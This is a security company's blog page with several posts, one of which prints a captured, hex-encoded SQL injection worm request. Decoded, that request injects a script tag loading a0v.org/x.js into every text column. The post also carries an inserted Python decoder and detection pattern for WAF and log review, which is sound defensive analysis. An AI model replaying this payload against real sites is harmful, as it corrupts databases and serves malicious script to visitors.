Hi all,
I moved my blog to http://www.zionsecurity.com/blog.aspx?show=Blog
My first blog post is about the insecure implementation of the Belgian eID module in Drupal!
Hope to see you there,
Erwin
Monday, March 1, 2010
Tuesday, November 3, 2009
Windows Mobile & ActiveSync troubleshooting
In English, because I didn't find a good solution online!
Problem: ActiveSync stopped working this weekend, and I received an error like "you don't have permissions in Exchange to sync", but that was BS. Nothing had changed on my account.
We had a customer with the same problem a few weeks ago: the same "no permissions" error and ActiveSync stopped working. This had to do, I think, with the change from summer to winter time and an incorrect date/time setting on the Windows Mobile.
We all use client certificates generated by our certificate authority, and checking the properties of the certificate on my Windows Mobile showed that it had expired on Halloween! No error message indicated anything like it.
Copying and installing a new certificate with private key on my Windows Mobile didn't solve the problem immediately. I think ActiveSync still used the old certificate, but deleting the old certificate and rebooting the device solved the ActiveSync problem!
I hope this is useful for some people, because I was able to find the error message but not the solution!
Monday, August 3, 2009
10 tips for a secure e-ID implementation
New whitepaper in which we give 10 tips for a secure implementation of the Belgian electronic identity card in a web application. More at http://www.zionsecurity.com/downloads/articles/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx
Friday, July 31, 2009
Whitepaper on selecting a secure open-source CMS now online
Our whitepaper comparing Drupal, Joomla! and Typo3 on the basis of vulnerabilities, the OWASP Top 10 and the like is now available on our new website: http://www.zionsecurity.com/downloads/whitepapers/whitepaper-selecting-a-secure-open-source-content-management-system.aspx
Wednesday, July 29, 2009
The SQL injection worm is still alive, and now also targets ASP.NET
Our web application firewall infrastructure has detected a new variant of the SQL injection worm, which now also attacks ASP.NET pages found via Google.
The payload:
POST /Page.aspx?id=RNI;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005 \
200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000760 \
06100720063006800610072002800320035003500290020004400450043004C004100520045002000540061006 \
2006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730 \
065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006 \
F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C00750 \
06D006E00730020006200200077006800650072006500200061002E00690064003D0062002E006900640020006 \
1006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E0 \
0780074007900700065003D003900390020006F007200200062002E00780074007900700065003D00330035002 \
0006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E007800740 \
07900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F00430075007 \
20073006F00720020004600450054004300480020004E004500580054002000460052004F004D0020002000540 \
0610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C00400043002 \
0005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D00300 \
02900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B002 \
7002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D007200740 \
0720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002 \
B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0 \
068007400740070003A002F002F006100300076002E006F00720067002F0078002E006A0073003E003C002F007 \
300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460 \
052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002 \
000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0 \
043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C006 \
5005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.0
This is hex encoding: the 0x... literal is the UTF-16LE byte sequence of the SQL statement (every character followed by a 00 byte, hence 4400 4500 4300 for "DEC"), which is exactly what CAST(0x... AS NVARCHAR(4000)) turns back into text before EXEC(@S) runs it. Burp Suite has no trouble decoding it :)
The only difference from the 2008 SQL injection worm is the script payload, which now links to a0v.org/x.js (do not visit!).
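To see what such a request actually carries, and to match it in WAF or proxy logs, here is an added Python example (it is not from the original post and not Burp Suite code). The hex excerpt is the first 112 digits of the payload shown above, i.e. its first two lines, and the rest of the constructed sample request is the real wrapper around it; the statement and URL in the constructed test case at the end are placeholders, not the worm's.

```python
import re
from urllib.parse import unquote

# First 112 hex digits of the captured literal (the first two lines of the payload above).
# The full literal decodes to the whole cursor loop; this excerpt decodes to its opening.
PAYLOAD_HEX_EXCERPT = (
    "4400450043004C00410052004500200040005400200076006100720063006800"
    "61007200280032003500350029002C004000430020007600"
)

# Constructed sample request: the exact wrapper of the captured request line, with the
# hex literal shortened to the excerpt above so the block stays readable.
SAMPLE_REQUEST = (
    "POST /Page.aspx?id=RNI;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + PAYLOAD_HEX_EXCERPT
    + "%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.0"
)

BENIGN_REQUEST = "GET /Page.aspx?id=42 HTTP/1.0"  # constructed, for comparison

# CAST(0x<hex> AS NVARCHAR ...) / CAST(0x<hex> AS VARCHAR ...), case-insensitive.
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)


def encode_nvarchar_hex(sql: str) -> str:
    """Build the literal the way the worm does: UTF-16LE bytes of the statement, hex-encoded."""
    return sql.encode("utf-16-le").hex().upper()


def decode_nvarchar_hex(hexdigits: str) -> str:
    """CAST(0x... AS NVARCHAR) reads the bytes as UTF-16LE (UCS-2), so decode them the same way."""
    return bytes.fromhex(hexdigits).decode("utf-16-le")


def extract_hex_sql(request_line: str) -> list:
    """Return the decoded SQL of every CAST(0x... AS NVARCHAR) literal in a raw request line."""
    decoded = unquote(request_line)  # the worm sends spaces as %20; match on the decoded text
    return [decode_nvarchar_hex(m.group(1)) for m in HEX_CAST.finditer(decoded)]


# The wrapper the worm needs to execute its hidden statement; hex encoding cannot hide it.
WRAPPER_MARKERS = ("DECLARE @", "CAST(0X", "EXEC(@")


def looks_like_hex_sqli(request_line: str) -> bool:
    """Flag a request that carries the DECLARE / CAST(0x...) / EXEC(@...) wrapper."""
    decoded = unquote(request_line).upper()
    return all(marker in decoded for marker in WRAPPER_MARKERS)


# Traces of the worm's mass-UPDATE logic that only become visible after decoding.
DECODED_MARKERS = ("sysobjects", "syscolumns", "<script")


def decoded_sql_markers(sql: str) -> list:
    """Return which of the decoded-statement markers appear in a decoded SQL string."""
    low = sql.lower()
    return [m for m in DECODED_MARKERS if m in low]


if __name__ == "__main__":
    for sql in extract_hex_sql(SAMPLE_REQUEST):
        print("decoded literal:", sql)
    print("wrapper matched:", looks_like_hex_sqli(SAMPLE_REQUEST))
    print("wrapper matched (benign):", looks_like_hex_sqli(BENIGN_REQUEST))
```

Matching on the wrapper rather than on the hex is what makes this hold up against the 2008 and 2009 variants alike: the script URL inside the literal changes, the DECLARE/CAST/EXEC scaffolding does not. Decoding the literal is still worth doing in the WAF or in log review, because it shows which tables and columns (sysobjects/syscolumns, text-typed columns) the statement walks and which URL it injects.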
Friday, July 24, 2009
Beta testers wanted for our Mollom client
For those who don't know Mollom: an anti-spam solution for web applications that keeps spam out of submitted messages. Used, among others, by our friends at Netlog.
Mollom has stopped 100 million spam messages since its launch: http://mollom.com/blog/hundred-million-spam-attempts-blocked
ZION SECURITY has developed a plug-in for IIS that lets ASP and ASP.NET sites integrate with Mollom without changing a single line of code in the existing application.
Interested? Contact us at info@zionsecurity.com
BTW: Mollom has a free version!